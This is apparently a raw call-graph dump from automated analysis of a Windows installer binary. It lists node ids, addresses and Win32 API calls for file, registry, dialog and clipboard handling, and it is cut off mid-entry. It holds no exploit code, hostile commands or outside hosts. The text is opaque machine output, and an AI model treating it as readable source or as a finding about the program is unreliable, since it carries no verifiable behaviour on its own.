4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 CoUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 